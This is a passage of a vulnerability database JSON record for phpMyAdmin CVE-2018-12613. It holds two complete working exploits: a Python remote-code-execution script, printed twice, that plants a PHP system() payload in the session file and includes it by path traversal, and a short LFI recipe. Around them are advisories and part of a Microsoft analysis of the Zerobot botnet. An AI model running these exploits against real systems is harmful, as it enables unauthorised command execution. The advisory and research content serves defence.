Include the session file :\r\nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k\n\n# 0day.today [2018-06-23] #", "sourceHref": "https://0day.today/exploit/30622", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-20T06:05:17", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "phpMyAdmin 4.8.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36949", "href": "https://0day.today/exploit/description/36949", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\n# Exploit Author: samguy\n# Vulnerability Discovery By: ChaMd5 & Henry Huang\n# Vendor Homepage: http://www.phpmyadmin.net\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\n# Version: 4.8.1\n# Tested on: Linux - Debian Buster (PHP 7.3)\n# CVE : CVE-2018-12613\n\n#!/usr/bin/env python\n\nimport 
re, requests, sys\n\n# check python major version\nif sys.version_info.major == 3:\n import html\nelse:\n from six.moves.html_parser import HTMLParser\n html = HTMLParser()\n\nif len(sys.argv) < 7:\n usage = \"\"\"Usage: {} [ipaddr] [port] [path] [username] [password] [command]\nExample: {} 192.168.56.65 8080 /phpmyadmin username password whoami\"\"\"\n print(usage.format(sys.argv[0],sys.argv[0]))\n exit()\n\ndef get_token(content):\n s = re.search('token\"\\s*value=\"(.*?)\"', content)\n token = html.unescape(s.group(1))\n return token\n\nipaddr = sys.argv[1]\nport = sys.argv[2]\npath = sys.argv[3]\nusername = sys.argv[4]\npassword = sys.argv[5]\ncommand = sys.argv[6]\n\nurl = \"http://{}:{}{}\".format(ipaddr,port,path)\n\n# 1st req: check login page and version\nurl1 = url + \"/index.php\"\nr = requests.get(url1)\ncontent = r.content.decode('utf-8')\nif r.status_code != 200:\n print(\"Unable to find the version\")\n exit()\n\ns = re.search('PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"', content)\nversion = s.group(1)\nif version != \"4.8.0\" and version != \"4.8.1\":\n print(\"The target is not exploitable\".format(version))\n exit()\n\n# get 1st token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 2nd req: login\np = {'token': token, 'pma_username': username, 'pma_password': password}\nr = requests.post(url1, cookies = cookies, data = p)\ncontent = r.content.decode('utf-8')\ns = re.search('logged_in:(\\w+),', content)\nlogged_in = s.group(1)\nif logged_in == \"false\":\n print(\"Authentication failed\")\n exit()\n\n# get 2nd token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 3rd req: execute query\nurl2 = url + \"/import.php\"\n# payload\npayload = '''select '<?php system(\"{}\") ?>';'''.format(command)\np = {'table':'', 'token': token, 'sql_query': payload }\nr = requests.post(url2, cookies = cookies, data = p)\nif r.status_code != 200:\n print(\"Query failed\")\n exit()\n\n# 4th req: execute payload\nsession_id = 
cookies.get_dict()['phpMyAdmin']\nurl3 = url + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}\".format(session_id)\nr = requests.get(url3, cookies = cookies)\nif r.status_code != 200:\n print(\"Exploit failed\")\n exit()\n\n# get result\ncontent = r.content.decode('utf-8', errors=\"replace\")\ns = re.search(\"select '(.*?)\\n'\", content, re.DOTALL)\nif s != None:\n print(s.group(1))\n", "sourceHref": "https://0day.today/exploit/36949", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-23T14:18:21", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T20:29:00", "type": "cve", "title": "CVE-2018-12613", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-11-02T17:59:00", "cpe": [], "id": "CVE-2018-12613", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "dsquare": [{"lastseen": "2021-11-27T02:37:17", "description": "Remote Code Execution in phpMyAdmin\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-07T00:00:00", "type": "dsquare", "title": "phpMyAdmin 4.8.1 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-07-07T00:00:00", "id": "E-655", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], 
"exploitdb": [{"lastseen": "2023-08-07T09:26:46", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-22T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-12613", "CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "EDB-ID:44928", "href": "https://www.exploit-db.com/exploits/44928", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution\r\n# Date: 2018-06-21\r\n# Exploit Author: VulnSpy\r\n# Vendor Homepage: http://www.phpmyadmin.net\r\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\r\n# Version: 4.8.0, 4.8.1\r\n# Tested on: php7 mysql5\r\n# CVE : CVE-2018-12613\r\n\r\n1. Run SQL Query : select '<?php phpinfo();exit;?>'\r\n2. 
Include the session file :\r\nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k", "sourceHref": "https://www.exploit-db.com/raw/44928", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-09-14T13:02:59", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 4.8.1 - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-12613", "CVE-2018-12613"], "modified": "2021-10-25T00:00:00", "id": "EDB-ID:50457", "href": "https://www.exploit-db.com/exploits/50457", "sourceData": "# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\r\n# Date: 17/08/2021\r\n# Exploit Author: samguy\r\n# Vulnerability Discovery By: ChaMd5 & Henry Huang\r\n# Vendor Homepage: http://www.phpmyadmin.net\r\n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz\r\n# Version: 4.8.1\r\n# Tested on: Linux - Debian Buster (PHP 7.3)\r\n# CVE : 
CVE-2018-12613\r\n\r\n#!/usr/bin/env python\r\n\r\nimport re, requests, sys\r\n\r\n# check python major version\r\nif sys.version_info.major == 3:\r\n import html\r\nelse:\r\n from six.moves.html_parser import HTMLParser\r\n html = HTMLParser()\r\n\r\nif len(sys.argv) < 7:\r\n usage = \"\"\"Usage: {} [ipaddr] [port] [path] [username] [password] [command]\r\nExample: {} 192.168.56.65 8080 /phpmyadmin username password whoami\"\"\"\r\n print(usage.format(sys.argv[0],sys.argv[0]))\r\n exit()\r\n\r\ndef get_token(content):\r\n s = re.search('token\"\\s*value=\"(.*?)\"', content)\r\n token = html.unescape(s.group(1))\r\n return token\r\n\r\nipaddr = sys.argv[1]\r\nport = sys.argv[2]\r\npath = sys.argv[3]\r\nusername = sys.argv[4]\r\npassword = sys.argv[5]\r\ncommand = sys.argv[6]\r\n\r\nurl = \"http://{}:{}{}\".format(ipaddr,port,path)\r\n\r\n# 1st req: check login page and version\r\nurl1 = url + \"/index.php\"\r\nr = requests.get(url1)\r\ncontent = r.content.decode('utf-8')\r\nif r.status_code != 200:\r\n print(\"Unable to find the version\")\r\n exit()\r\n\r\ns = re.search('PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"', content)\r\nversion = s.group(1)\r\nif version != \"4.8.0\" and version != \"4.8.1\":\r\n print(\"The target is not exploitable\".format(version))\r\n exit()\r\n\r\n# get 1st token and cookie\r\ncookies = r.cookies\r\ntoken = get_token(content)\r\n\r\n# 2nd req: login\r\np = {'token': token, 'pma_username': username, 'pma_password': password}\r\nr = requests.post(url1, cookies = cookies, data = p)\r\ncontent = r.content.decode('utf-8')\r\ns = re.search('logged_in:(\\w+),', content)\r\nlogged_in = s.group(1)\r\nif logged_in == \"false\":\r\n print(\"Authentication failed\")\r\n exit()\r\n\r\n# get 2nd token and cookie\r\ncookies = r.cookies\r\ntoken = get_token(content)\r\n\r\n# 3rd req: execute query\r\nurl2 = url + \"/import.php\"\r\n# payload\r\npayload = '''select '<?php system(\"{}\") ?>';'''.format(command)\r\np = {'table':'', 'token': token, 
'sql_query': payload }\r\nr = requests.post(url2, cookies = cookies, data = p)\r\nif r.status_code != 200:\r\n print(\"Query failed\")\r\n exit()\r\n\r\n# 4th req: execute payload\r\nsession_id = cookies.get_dict()['phpMyAdmin']\r\nurl3 = url + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}\".format(session_id)\r\nr = requests.get(url3, cookies = cookies)\r\nif r.status_code != 200:\r\n print(\"Exploit failed\")\r\n exit()\r\n\r\n# get result\r\ncontent = r.content.decode('utf-8', errors=\"replace\")\r\ns = re.search(\"select '(.*?)\\n'\", content, re.DOTALL)\r\nif s != None:\r\n print(s.group(1))", "sourceHref": "https://www.exploit-db.com/raw/50457", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2021-06-08T18:43:49", "description": "This update for phpMyAdmin fixes multiple issues.\n\n Security issues fixed:\n\n * CVE-2018-12613: File inclusion and remote code execution attack\n (boo#1098751)\n * CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\n This update to version 4.8.2 also contains number of upstream bug fixes\n and improvements.\n\n", "cvss3": {}, "published": "2018-06-23T15:08:44", "type": "suse", "title": "Security update for phpMyAdmin (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-12581"], "modified": "2018-06-23T15:08:44", "id": "OPENSUSE-SU-2018:1806-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00044.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-06-08T18:43:49", "description": "This update for phpMyAdmin fixes multiple issues.\n\n Security issues fixed:\n\n * CVE-2018-12613: File inclusion and remote code execution attack\n (boo#1098751)\n * CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\n This update to version 4.8.2 also contains number of upstream bug fixes\n and improvements.\n\n", "cvss3": {}, "published": "2018-06-23T15:10:01", "type": "suse", 
"title": "Security update for phpMyAdmin (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-12613", "CVE-2018-12581"], "modified": "2018-06-23T15:10:01", "id": "OPENSUSE-SU-2018:1809-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00046.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-06-23T15:10:47", "description": "\n\nThe phpMyAdmin development team reports:\n\nSummary\nXSS in Designer feature\nDescription\nA Cross-Site Scripting vulnerability was found in the\n\t Designer feature, where an attacker can deliver a\n\t payload to a user through a specially-crafted database\n\t name.\nSeverity\nWe consider this attack to be of moderate severity.\n\n\nSummary\nFile inclusion and remote code execution attack\nDescription\nA flaw has been discovered where an attacker can include\n\t (view and potentially execute) files on the server.\nThe vulnerability comes from a portion of code where\n\t pages are redirected and loaded within phpMyAdmin, and an\n\t improper test for whitelisted pages.\nAn attacker must be authenticated, except in these\n\t situations:\n\n$cfg['AllowArbitraryServer'] = true: attacker can\n\t specify any host he/she is already in control of, and\n\t execute arbitrary code on phpMyAdmin\n$cfg['ServerDefault'] = 0: this bypasses the login and\n\t runs the vulnerable code without any authentication\n\nSeverity\nWe consider this to be severe. Mitigation\n\t factor Configuring PHP with a restrictive\n\t `open_basedir` can greatly restrict an attacker's ability to\n\t view files on the server. 
Vulnerable systems should not be\n\t run with the phpMyAdmin directives\n\t $cfg['AllowArbitraryServer'] = true or $cfg['ServerDefault']\n\t = 0\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T00:00:00", "type": "freebsd", "title": "phpmyadmin -- remote code inclusion and XSS scripting", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2018-06-21T00:00:00", "id": "17CB6FF3-7670-11E8-8854-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/17cb6ff3-7670-11e8-8854-6805ca0b3d42.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-06-23T15:18:01", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases.\n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nPlease review the CVE identifiers referenced below for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-4.8.4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-15T00:00:00", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613", "CVE-2018-19968", "CVE-2018-19969", "CVE-2018-19970"], "modified": "2019-04-15T00:00:00", "id": "GLSA-201904-16", "href": "https://security.gentoo.org/glsa/201904-16", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. 
Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. 
We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. 
Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. 
Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. 
See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. 
\nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. 
The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to 